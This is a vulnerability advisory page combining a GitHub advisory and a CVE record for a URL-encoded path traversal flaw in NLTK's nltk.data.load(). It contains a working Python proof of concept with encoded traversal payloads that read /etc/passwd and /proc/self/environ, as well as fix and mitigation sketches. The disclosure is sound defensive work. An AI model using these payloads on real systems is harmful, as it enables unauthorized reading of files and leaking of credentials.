Vulnerability-Lookup

GHSA-P4GQ-832X-FM9V

Vulnerability from github – Published: 2026-06-16 14:34 – Updated: 2026-06-16 14:34

Summary

Natural Language Toolkit (NLTK): URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read

Details

Summary

nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.

Affected Component

nltk/data.py — find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check. Relevant occurrences:

data.py L650–L653: final path constructed from url2pathname(resource_name) after checks
data.py L54–L69: _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string
data.py L219–L245: normalize_resource_url() for nltk: scheme contributes to decode-after-check
data.py L615–L618: defense-in-depth traversal check also operates on undecoded input

Root Cause

The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.
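
The ordering problem can be reproduced in isolation. The sketch below is illustrative only: UNSAFE_RE is a hypothetical, simplified stand-in and not NLTK's actual _UNSAFE_NO_PROTOCOL_RE, and urllib.parse.unquote() stands in for the percent-decoding that url2pathname() performs. The function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Hypothetical, simplified unsafe-path check (NOT NLTK's real regex):
# flags a leading "/" or a ".." path segment.
UNSAFE_RE = re.compile(r"^/|(^|/)\.\.(/|$)")


def check_then_decode(resource):
    """Flawed order: validate the raw string, then decode it."""
    if UNSAFE_RE.search(resource):
        raise ValueError(f"unsafe path: {resource!r}")
    # Stand-in for the %xx decoding done later by url2pathname().
    return unquote(resource)


def decode_then_check(resource):
    """Safer order: decode first, then validate the string that will be used."""
    decoded = unquote(resource)
    if UNSAFE_RE.search(decoded):
        raise ValueError(f"unsafe path after decoding: {decoded!r}")
    return decoded
```

With the flawed order, check_then_decode("%2fetc%2fpasswd") returns "/etc/passwd", while decode_then_check() rejects the same input. A single decode before the check only helps if nothing downstream decodes the value a second time.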

Proof of Concept

"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
  nltk/data.py:find() checks resource names against a regex for
  traversal patterns (../, leading /, etc.) BEFORE calling
  url2pathname() which decodes %xx sequences. This is a classic
  "decode-after-check" vulnerability.
"""

import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
 NLTK URL-Encoded Path Traversal PoC
 Affected: nltk <= 3.9.4
 Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)

def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f"  [VULN] {name}")
        print(f"         Payload: {payload}")
        print(f"         Read OK: {first_line}")
        return True
    except Exception as e:
        print(f"  [SAFE] {name}")
        print(f"         Payload: {payload}")
        print(f"         Blocked: {type(e).__name__}: {e}")
        return False


def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass \\.\\./ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1

    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses \\.\\./ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f"  [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f"         {key}=...")
        vulns += 1
    except Exception as e:
        print(f"  [SAFE] Blocked: {e}")

    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")

    print()
    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()

Impact

Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:

/etc/passwd, /etc/shadow (if readable)
/proc/self/environ: leaks environment variables, often containing API keys, DB credentials, cloud secrets
Application source code and configuration files
Cloud metadata, deployment secrets, SSH keys

This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.
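
For applications that cannot upgrade immediately, one possible caller-side guard is to accept only plain relative resource names before anything reaches nltk.data.load(). This is a minimal sketch under stated assumptions, not part of NLTK: safe_resource_name() and the allowed character set are hypothetical and should be adapted to the resource names an application actually uses.

```python
import re

# Assumption: legitimate resource names consist of segments such as
# "corpora", "punkt", or "english.pickle". Each segment must start with
# a letter, digit, or underscore, so "." and ".." are rejected.
_SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.\-]*")


def safe_resource_name(user_value):
    """Return user_value unchanged if it is a plain relative name, else raise ValueError."""
    # Reject percent-encoding, backslashes, and scheme/drive separators outright,
    # so no later decoding step can turn the value into something else.
    if any(ch in user_value for ch in "%\\:"):
        raise ValueError(f"disallowed character in resource name: {user_value!r}")
    for segment in user_value.split("/"):
        # Empty segments cover leading "/", trailing "/", and "//".
        if not _SAFE_SEGMENT.fullmatch(segment):
            raise ValueError(f"disallowed path segment in resource name: {user_value!r}")
    return user_value
```

A caller would validate first and only then build the resource identifier, for example by passing safe_resource_name(value) on to nltk.data.load(). An allowlist is used here instead of a blocklist because it does not depend on anticipating every encoding of a traversal sequence.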

Severity

7.5 (High)


                  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

JSON

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.9.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T14:34:15Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nnltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK\u0027s SECURITY.md and read arbitrary files from the filesystem.\nWhile literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.\n### Affected Component\nnltk/data.py \u2014 find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check.\nRelevant occurrences:\n\ndata.py L650\u2013L653 \u2014 final path constructed from url2pathname(resource_name) after checks\ndata.py L54\u2013L69 \u2014 _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string\ndata.py L219\u2013L245 \u2014 normalize_resource_url() for nltk: scheme contributes to decode-after-check\ndata.py L615\u2013L618 \u2014 defense-in-depth traversal check also operates on undecoded input\n\nRoot Cause\nThe regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.\n### Proof of Concept\n```\n\"\"\"\nNLTK Arbitrary File Read via URL-Encoded Path Traversal\n=======================================================\nBypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py\nby URL-encoding path separators and traversal components.\n\nAffected: NLTK \u003c= 3.9.4 (default ENFORCE=False configuration)\nCWE: CWE-22 (Path Traversal)\n\nRoot Cause:\n  nltk/data.py:find() checks resource names against a regex for\n  traversal patterns (../, leading /, etc.) 
BEFORE calling\n  url2pathname() which decodes %xx sequences. This is a classic\n  \"decode-after-check\" vulnerability.\n\"\"\"\n\nimport sys\nimport os\nimport warnings\n\n# Suppress NLTK security warnings for clean PoC output\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n# Setup\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"nltk\"))\nos.makedirs(os.path.expanduser(\"~/nltk_data/corpora\"), exist_ok=True)\n\nimport nltk\nfrom nltk.pathsec import ENFORCE\n\nBANNER = \"\"\"\n===================================================\n NLTK URL-Encoded Path Traversal PoC\n Affected: nltk \u003c= 3.9.4\n Default ENFORCE={enforce}\n===================================================\n\"\"\".format(enforce=ENFORCE)\n\ndef test_variant(name, payload, fmt=\"raw\"):\n    \"\"\"Test a single traversal variant.\"\"\"\n    try:\n        content = nltk.data.load(payload, format=fmt)\n        if isinstance(content, bytes):\n            preview = content[:200].decode(\"utf-8\", errors=\"replace\")\n        else:\n            preview = content[:200]\n        first_line = preview.split(\"\\n\")[0]\n        print(f\"  [VULN] {name}\")\n        print(f\"         Payload: {payload}\")\n        print(f\"         Read OK: {first_line}\")\n        return True\n    except Exception as e:\n        print(f\"  [SAFE] {name}\")\n        print(f\"         Payload: {payload}\")\n        print(f\"         Blocked: {type(e).__name__}: {e}\")\n        return False\n\n\ndef main():\n    print(BANNER)\n    vulns = 0\n\n    # --- Variant 1: URL-encoded absolute path ---\n    print(\"[1] URL-encoded absolute path (%2f = /)\")\n    if test_variant(\n        \"Encoded leading slash bypasses ^/ regex check\",\n        \"nltk:%2fetc%2fpasswd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 2: Encoded dot-dot traversal ---\n    print(\"[2] URL-encoded dot-dot traversal (%2e = .)\")\n    if test_variant(\n        \"Encoded dots bypass \\\\.\\\\./ regex 
check\",\n        \"nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 3: Literal dots with encoded slash ---\n    print(\"[3] Literal dots with encoded slash (..%2f)\")\n    if test_variant(\n        \"Encoded slash after literal .. bypasses \\\\.\\\\./ regex\",\n        \"nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\",\n    ):\n        vulns += 1\n\n    print()\n\n    # --- Variant 4: Read process environment (credential leak) ---\n    print(\"[4] Read /proc/self/environ (credential leakage)\")\n    try:\n        content = nltk.data.load(\"nltk:%2fproc%2fself%2fenviron\", format=\"raw\")\n        env_vars = content.decode(\"utf-8\", errors=\"replace\").split(\"\\x00\")\n        print(f\"  [VULN] Leaked {len(env_vars)} environment variables\")\n        for var in env_vars[:3]:\n            if var:\n                key = var.split(\"=\")[0] if \"=\" in var else var\n                print(f\"         {key}=...\")\n        vulns += 1\n    except Exception as e:\n        print(f\"  [SAFE] Blocked: {e}\")\n\n    print()\n\n    # --- Control: verify normal traversal IS blocked ---\n    print(\"[CONTROL] Verify literal ../ is blocked by regex\")\n    test_variant(\"Direct traversal (should be blocked)\", \"nltk:../../../etc/passwd\")\n\n    print()\n    print(\"=\" * 51)\n    print(f\" Result: {vulns} bypass variant(s) succeeded\")\n    if vulns \u003e 0:\n        print(\" Status: VULNERABLE (url2pathname decodes after regex check)\")\n    else:\n        print(\" Status: Not vulnerable\")\n    print(\"=\" * 51)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n### Impact\nArbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). 
Realistic targets include:\n\n/etc/passwd, /etc/shadow (if readable)\n/proc/self/environ \u2014 leaks environment variables, often containing API keys, DB credentials, cloud secrets\nApplication source code and configuration files\nCloud metadata, deployment secrets, SSH keys\n\nThis is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK\u0027s SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.",
  "id": "GHSA-p4gq-832x-fm9v",
  "modified": "2026-06-16T14:34:15Z",
  "published": "2026-06-16T14:34:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Natural Language Toolkit (NLTK): URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read"
}

CVE-2026-54293 (GCVE-0-2026-54293)

Vulnerability from cvelistv5 – Published: 2026-06-22 17:25 – Updated: 2026-07-02 12:05

Title

NLTK: URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read

Summary

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1.
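
The affected range stated above can be turned into a simple check. This is a rough sketch, not an official tool: release_tuple() and is_affected() are hypothetical helpers, and the comparison looks only at the numeric release, so any 3.10.0 pre-release is treated as fixed. That matches 3.10.0-rc1 but would misclassify a hypothetical earlier pre-release of 3.10.0.

```python
import re

# Per the advisory: versions prior to 3.10.0-rc1 are affected.
FIXED_RELEASE = (3, 10, 0)


def release_tuple(version):
    """Extract the leading numeric release, e.g. '3.9.4' -> (3, 9, 4)."""
    match = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    # Missing components count as zero, so '3.9' becomes (3, 9, 0).
    return tuple(int(part or 0) for part in match.groups())


def is_affected(version):
    """Return True if the numeric release is below the fixed release."""
    return release_tuple(version) < FIXED_RELEASE
```

The installed version string can be obtained with importlib.metadata.version("nltk") and passed to is_affected().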

Severity

7.5 (High)


                        
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

SSVC

Exploitation: poc
Automatable: yes
Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

5 references

URL	Tags
https://github.com/nltk/nltk/security/advisories/…	x_refsource_CONFIRM
https://github.com/nltk/nltk/pull/3575	x_refsource_MISC
https://access.redhat.com/security/cve/CVE-2026-54293	vdb-entry, x_refsource_REDHAT
https://bugzilla.redhat.com/show_bug.cgi?id=2491486	issue-tracking, x_refsource_REDHAT
https://security.access.redhat.com/data/csaf/v2/v…	x_sadp-csaf-vex

Impacted products

5 products

Vendor	Product	Version
nltk	nltk	Affected: < 3.10.0-rc1
Red Hat	Exploit Intelligence	cpe:/a:redhat:exploit_intelligence:0
Red Hat	OpenShift Lightspeed	cpe:/a:redhat:openshift_lightspeed
Red Hat	Red Hat Ansible Automation Platform 2	cpe:/a:redhat:ansible_automation_platform:2
Red Hat	Red Hat OpenShift AI (RHOAI)	cpe:/a:redhat:openshift_ai

JSON

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-54293",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-22T21:18:34.399949Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-22T21:18:59.775Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:/a:redhat:exploit_intelligence:0"
            ],
            "defaultStatus": "affected",
            "product": "Exploit Intelligence",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:openshift_lightspeed"
            ],
            "defaultStatus": "affected",
            "product": "OpenShift Lightspeed",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:ansible_automation_platform:2"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat Ansible Automation Platform 2",
            "vendor": "Red Hat"
          },
          {
            "cpes": [
              "cpe:/a:redhat:openshift_ai"
            ],
            "defaultStatus": "affected",
            "product": "Red Hat OpenShift AI (RHOAI)",
            "vendor": "Red Hat"
          }
        ],
        "datePublic": "2026-06-22T17:25:05.611Z",
        "descriptions": [
          {
            "lang": "en",
            "value": "A flaw was found in NLTK (Natural Language Toolkit). The `nltk.data.load()` function is vulnerable to path traversal when processing specially crafted `nltk:` URLs. An attacker can exploit a decode-after-check flaw, where URL-encoded path separators and traversal segments bypass security checks. This allows the attacker to read arbitrary files from the filesystem, leading to information disclosure."
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "namespace": "https://access.redhat.com/security/updates/classification/",
                "value": "Important"
              },
              "type": "Red Hat severity rating"
            }
          },
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "version": "3.1"
            },
            "format": "CVSS"
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-22",
                "description": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-07-02T12:05:25.031Z",
          "orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
          "shortName": "redhat-SADP"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "x_refsource_REDHAT"
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2026-54293"
          },
          {
            "name": "RHBZ#2491486",
            "tags": [
              "issue-tracking",
              "x_refsource_REDHAT"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491486"
          },
          {
            "tags": [
              "x_sadp-csaf-vex"
            ],
            "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54293.json"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2026-06-22T19:01:09.319Z",
            "value": "Reported to Red Hat."
          },
          {
            "lang": "en",
            "time": "2026-06-22T17:25:05.611Z",
            "value": "Made public."
          }
        ],
        "title": "nltk: NLTK: Information Disclosure via Path Traversal in `nltk.data.load()`",
        "workarounds": [
          {
            "lang": "en",
            "value": "Update the nltk package to version 3.10.0 or later when a stable release is available. Upstream has fixed this issue in 3.10.0-rc1.\n\nUntil updated builds are available, do not pass attacker-controlled resource identifiers to nltk.data.load() when using the nltk: URL scheme. Restrict NLTK data loading to trusted, application-controlled paths."
          }
        ],
        "x_adpType": "supplier",
        "x_generator": {
          "engine": "sadp-cli 1.0.0"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nltk",
          "vendor": "nltk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.10.0-rc1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK\u0027s SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-22T17:25:05.611Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nltk/nltk/security/advisories/GHSA-p4gq-832x-fm9v"
        },
        {
          "name": "https://github.com/nltk/nltk/pull/3575",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nltk/nltk/pull/3575"
        }
      ],
      "source": {
        "advisory": "GHSA-p4gq-832x-fm9v",
        "discovery": "UNKNOWN"
      },
      "title": "NLTK: URL-Encoded Path Traversal in nltk.data.load() Allows Arbitrary Local File Read"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-54293",
    "datePublished": "2026-06-22T17:25:05.611Z",
    "dateReserved": "2026-06-12T17:46:37.293Z",
    "dateUpdated": "2026-07-02T12:05:25.031Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

